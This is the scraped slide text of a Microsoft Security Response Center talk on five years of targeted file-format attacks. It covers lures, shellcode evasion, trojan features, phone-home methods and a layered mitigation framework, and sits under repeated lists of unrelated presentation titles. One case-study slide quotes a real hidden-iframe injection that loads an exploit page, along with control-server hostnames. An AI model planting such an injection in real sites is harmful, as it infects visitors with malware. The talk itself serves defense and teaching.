Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Principled Technologies
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 

Dernier (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 

Five years of Persistent Threats

  • 1. Title of Presentation Maarten Van Horenbeeck Senior Program Manager Five Years of Persistent Threats Microsoft Security Response Center Trustworthy Computing
  • 2.
  • 3.
  • 4.
  • 6. Microsoft Corporation | Trustworthy Computing (TWC) Agenda • Introduction to file format based attacks • Why do these attacks work? • Have they grown more complicated? • How do attackers hide their activities? • What can we do?
  • 7. Microsoft Corporation | Trustworthy Computing (TWC) Growth of Attacks Total Submissions By Year 2005 Totals 2006 Totals 2007 Totals 2008 Totals 2009 Totals 135% increase250% increase 250% Source: Microsoft Malware Protection Center (MMPC)
  • 8. Microsoft Corporation | Trustworthy Computing (TWC) Methodology E-mail server Web proxy Compromised machine Control server
  • 9. Microsoft Corporation | Trustworthy Computing (TWC) Free webmail Compromised machine Control server Methodology
  • 10. Microsoft Corporation | Trustworthy Computing (TWC) The LureSocial Engineering
  • 11. Microsoft Corporation | Trustworthy Computing (TWC) Social Engineering
  • 12. Microsoft Corporation | Trustworthy Computing (TWC) Social Engineering • Clever use of social engineering techniques  Cognitive dissonance  Mimicking writing styles  Matching content to interest  Convincing users to forward messages  Backdooring “memes” and viral content  Creating a trusted resource
  • 13. Microsoft Corporation | Trustworthy Computing (TWC) The LureThe Attack
  • 14. Microsoft Corporation | Trustworthy Computing (TWC) How Content-Type Attacks Work Vulnerability Shellcode Shellcode Embedded binary Clean document with same context Malicious document Encrypted stub or packed binary Loaded after successful exploitation
  • 15. Microsoft Corporation | Trustworthy Computing (TWC) Generations of exploits • Major changes:  Shellcode attempts to evade antivirus and Intrusion Detection  Obfuscation techniques  File types being exploited  The goal and payload of attacks  “Phone home” methods • Quality and reliability of exploits  Depends on the vulnerability being exploited  Did not change drastically
  • 16. Microsoft Corporation | Trustworthy Computing (TWC) Generations of packing- avoiding detection PE header in plain sight. Simple XOR obfuscation XOR followed by ROL/ROR Custom encoders
  • 17. Microsoft Corporation | Trustworthy Computing (TWC) Generations of shellcode– avoiding detection • Most static shellcode detectors work by identifying common GetPC patterns
  • 18. Microsoft Corporation | Trustworthy Computing (TWC) Generations of shellcode- Anti-emulation
  • 19. Microsoft Corporation | Trustworthy Computing (TWC) Generations of shellcode- API Hooks
  • 20. Microsoft Corporation | Trustworthy Computing (TWC) The LureThe Trojan
  • 21. Microsoft Corporation | Trustworthy Computing (TWC) The Trojan
  • 22. Microsoft Corporation | Trustworthy Computing (TWC) “File Management” “Screen Monitor” “Keyboard Monitor” “Remote Terminal” “System Management” “Video Monitor” “Conversation Management” “Others” “Select All” “Undo Select” The Trojan
  • 23. Microsoft Corporation | Trustworthy Computing (TWC) Phone Home Methods
  • 24. Microsoft Corporation | Trustworthy Computing (TWC) DNS Server Victim Responder Phone Home Methods: split horizon
  • 25. Microsoft Corporation | Trustworthy Computing (TWC) Phone Home Methods
  • 26. Microsoft Corporation | Trustworthy Computing (TWC)
  • 27. Microsoft Corporation | Trustworthy Computing (TWC) The LureCase Study
  • 28. Microsoft Corporation | Trustworthy Computing (TWC) Case Study
  • 29. Microsoft Corporation | Trustworthy Computing (TWC) Case Study  v_080310.asd Nokia_7650_video_en.doc  Connects to uprise.lamaonl.com  Host name already disabled
  • 30. Microsoft Corporation | Trustworthy Computing (TWC) Case Study • April 9, 2008 • Drive-by exploit on the web site of a UK organization <iframe src=http://59.120.21.6/img/ft/ex.html width=0 heigh=0></iframe> • This web location • Identifies the user’s web browser • Offers an exploit specifically for that version • Downloads and runs “ipsec.exe” from a server in Taiwan • Connects to control server: freetibet.lamalive.com • This hostname stopped resolving after 48 hours
  • 31. Microsoft Corporation | Trustworthy Computing (TWC) Case Study • Five months later + 2008-07-12 10:20 | freetibet.lamalife.com | 218.30.103.68 - 2008-08-14 17:46 | freetibet.lamalife.com | 218.30.103.68 + 2008-09-21 04:16 | freetibet.lamalife.com | 69.64.155.78 - 2008-09-25 06:45 | freetibet.lamalife.com | 69.64.155.78 - 2008-09-26 00:37 | freetibet.lamalife.com | 208.73.210.32 + 2008-07-12 09:59 | uprise.lamaonl.com | 218.30.103.68 + 2008-09-21 04:23 | uprise.lamaonl.com | 69.64.155.75 + 2008-09-25 05:08 | uprise.lamaonl.com | 69.64.155.78 31
  • 32. Microsoft Corporation | Trustworthy Computing (TWC) The LureDefense
  • 33. Microsoft Corporation | Trustworthy Computing (TWC) Roles and opportunities • Software vendors  Opt-in to operating system mitigations  Have a defined software incident response process  Build security into the development lifecycle • CERTs, WARPs, ISACs • Promote sharing of technical incident information • Define a process that allows learning during response • Enterprise  Network deployment & design  Intelligence-driven Risk Management
  • 34. Microsoft Corporation | Trustworthy Computing (TWC) What Microsoft is doing • Build secure software  Software Development Lifecycle  Significant investment in mitigation technology • Improve security response  Information sharing programs (MAPP, DISP) • Empower customers  Windows Server: ESC, Core installation  MOICE, Office File Validation  Forensic and mitigation tools
  • 35. Microsoft Corporation | Trustworthy Computing (TWC) Office • Office 2003 SP3 security push • Office File Validation and Protected View Source: Security Intelligence Report (2009)
  • 36. Microsoft Corporation | Trustworthy Computing (TWC) Exploit mitigations Visual Studio Windows Internet Explorer Office 2003 2004 2005 2006 2007 2008 2009 2010 2011
  • 37.
  • 38.
  • 39. Microsoft Corporation | Trustworthy Computing (TWC) EMET: Heap spray pre-allocation 01010101010101010101010101 00101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101001010110 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 01010101010101010101010101 00101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 10101010101010101010101010 101010101010EMETEMETEMETE METEMETEMETEMETEMET10101 01010101010101010100101011 01010101010101010101010101 01010101010101010101010101 01010101010101010101010101 01010101010101010101010101 0
  • 43.
  • 44.
  • 45. Microsoft Corporation | Trustworthy Computing (TWC) Exfiltration Compromise Social Engineering Infiltration Data Access Mitigation framework
  • 46. Microsoft Corporation | Trustworthy Computing (TWC) Basic: • E-mail security policy • Security awareness training • Filter external e-mails from the organizational domain Enhanced: • Employ Sender-ID or SPF technology • Enhanced awareness training for high value targets • Sharing intelligence on attack patterns Strong: • Digitally sign e-mails • Web site whitelisting Mitigation framework
  • 47. Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Anti-virus deployed on the gateway • Blocking suspicious attachment types • Spam filtering Enhanced: • Re-scan previously accepted attachments on the mail server Strong: • Dynamic execution and validation of attachments • Web site whitelisting Mitigation framework
  • 48. Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Anti-virus • Security updates • Reduce user privileges on the system • Disable document macros Enhanced: • Anti-virus with Host Intrusion Prevention • Enable DEP and SEHOP system-wide • Harden applications (e.g. block Javascript execution) • Use MOICE for Office document security • Office File Validation Strong: • Deploy EMET for internet-facing applications • Application whitelisting Mitigation framework
  • 49. Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Log access to data resources • Deploy split horizon DNS Enhanced: • Audit access to data resources • Deploy Extended Protection for Authentication (EPA) • Correlate data access with network logins Strong: • Multi-factor authentication • Segregation of data stores and untrusted network access Mitigation framework
  • 50. Microsoft Corporation | Trustworthy Computing (TWC) Basic: • Log access to web sites • Block outbound network access • Use of a content-aware web proxy Enhanced: • Exchange information with CERTs, law enforcement and/or industry partners • DNS monitoring, correlation and log analysis • Black-list access to specific web sites • Deploy DRM and/or data loss prevention tools Strong: • White-list access to specific web sites Mitigation framework
  • 51. Title of Presentation Maarten Van Horenbeeck maarten.vanhorenbeeck@microsoft.com Featuring work by: Bruce Dang Jonathan Ness Matt Miller Microsoft Security Response Center secure@microsoft.com http://www.microsoft.com/security Microsoft Corporation | Trustworthy Computing (TWC) © 2011 Microsoft Corporation. All rights reserved. Microsoft and Microsoft Office are or may be registered trademarks and/or trademarks in the U.S. and/or other countries. The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION. Thank you!